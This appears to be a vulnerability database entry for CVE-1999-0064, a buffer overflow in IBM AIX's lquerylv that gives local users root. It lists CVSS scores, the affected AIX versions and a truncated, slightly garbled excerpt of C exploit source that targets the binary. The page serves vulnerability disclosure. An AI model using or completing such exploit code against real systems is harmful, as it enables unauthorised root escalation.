7.2
CVSSv2

CVE-1999-0064

Published: 26/05/1997 Updated: 17/08/2022
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in AIX lquerylv program gives root access to local users.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm aix 3.2.5

ibm aix 3.2.4

ibm aix 4.1.4

ibm aix 4.2

ibm aix 4.1.5

ibm aix 4.1.1

ibm aix 4.1.2

ibm aix 4.1

ibm aix 4.1.3

ibm aix 3.2

Exploits

#include <stdioh> #include <stdlibh> #include <stringh> char prog[100]="/usr/sbin/lquerylv"; char prog2[30]="lquerylv"; extern int execv(); char *createvar(char *name,char *value) { char *c; int l; l=strlen(name)+strlen(value)+4; if (! (c=malloc(l))) {perror("error allocating");exit(2);}; strcpy(c,name); strcat(c,"="); strca ...